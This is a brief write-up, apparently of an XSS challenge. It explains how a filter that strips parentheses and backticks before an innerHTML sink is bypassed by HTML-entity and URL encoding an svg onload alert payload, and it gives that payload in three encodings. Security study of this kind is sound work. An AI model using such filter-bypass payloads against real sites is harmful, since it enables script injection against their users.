Here we have a clear sink will.innerHTML
, but alert(1337)
can't be
called because the filter removes ()`
characters. But the filter forgets to
consider that the values of the attribtues can be HTML entity encoded, hence we simply encode
the payload. Additionally we URL encode the payload because it has some URL unsafe characters
like &
.
<!-- URL Encoding + HTML Entity Encoding -->
%3Csvg%20onload%3D%22%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x33%3B%26%23x33%3B%26%23x37%3B%26%23x29%3B%22%3E
<!-- HTML Entity Encoding -->
<svg onload="alert(1337)">
<!-- No Encoding -->
<svg onload="alert(1337)">